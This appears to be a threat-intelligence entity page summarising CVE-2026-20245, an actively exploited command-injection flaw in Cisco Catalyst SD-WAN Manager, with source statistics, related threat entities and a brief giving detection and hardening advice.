Cisco Catalyst SD-WAN Manager command-injection to root (actively exploited, no patch)

cve · CVE-2026-20245

Coverage timeline

first 2026-06-06 → last 2026-06-06

Briefs

1 distinct

Sources cited

29 hosts

Sections touched

trending_vulns

Co-occurring entities

see Related entities below

Story timeline

2026-06-06CTI Daily Brief — 2026-06-06
trending_vulnsFirst coverage. Second SD-WAN Manager zero-day; post-auth (netadmin) command injection to root, chainable with pre-auth CVE-2026-20182; Cisco confirms limited ITW config-push exploitation; no patch.

Where this entity is cited

trending_vulns1

Source distribution

attack.mitre.org6 (13%)
blog.talosintelligence.com6 (13%)
sec.cloudapps.cisco.com5 (11%)
security-hub.ncsc.admin.ch2 (4%)
bleepingcomputer.com2 (4%)
thehackernews.com2 (4%)
theregister.com2 (4%)
bankinfosecurity.com1 (2%)
other21 (45%)

Related entities

Cisco Talos — demo.pdb BadIIS commodity MaaS ISAPI backdoor; lwxat developer alias; builder tool recovered; UAT-8099 / DragonRank link; 1,800+ IIS servers compromised globally
campaignitem:cisco-talos-badiis-demo-pdb-maas-isapi-backdoor-lwxat-dragon×1
Cisco Talos — DICOM-format heap OOB-write attack surface against Orthanc PACS (pydicom/GDCM)
vulnerability-trenditem:talos-dicom-pacs-orthanc-heap-attack-surface×1
NCSC-CH: Booking.com breach feeds WhatsApp hotel-booking phishing (TWINT/bank spoof + booking-channel ATO)
incidentincident:ncsc-ch-booking-hotel-phishing-2026×1

External references

NVD · cve.org · CISA KEV

All cited sources (47)

Items in briefs about Cisco Catalyst SD-WAN Manager command-injection to root (actively exploited, no patch) (1)

CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: actively-exploited command-injection to root (no patch)

From CTI Daily Brief — 2026-06-06 · published 2026-06-06 · view item permalink →

Cisco has confirmed a second actively-exploited zero-day in Catalyst SD-WAN Manager (formerly vManage), tracked as CVE-2026-20245 (Cisco PSIRT; NCSC-CH GovCERT, 2026-06-05). It is a command-injection flaw: an attacker with netadmin privileges can inject arbitrary OS commands that execute as root on the underlying appliance (T1059.004 Unix Shell, following T1078 Valid Accounts). Per Cisco, exploitation requires either valid netadmin credentials or prior exploitation of the pre-auth bypass CVE-2026-20182 (covered in weekly W22) or CVE-2026-20127 — making the realistic path an unauthenticated-to-root chain against an internet-exposed Manager. Cisco states it has "observed limited cases where the exploitation of this bug resulted in a configuration change pushed to edge devices," i.e. the blast radius extends from the management plane to every managed edge router. No fixed release is available; Cisco's only guidance is to restrict management-plane access to trusted hosts and verify edge-device configuration. Detection concepts: review the SD-WAN Manager CLI audit log for unexpected command execution and EDR/host telemetry for shells spawned under the management daemon's service account; treat any unplanned config push to edge devices as a hunting trigger. Hardening: ACL the management interface to a dedicated management VLAN, enforce MFA for netadmin, and rotate Manager credentials given confirmed in-the-wild use.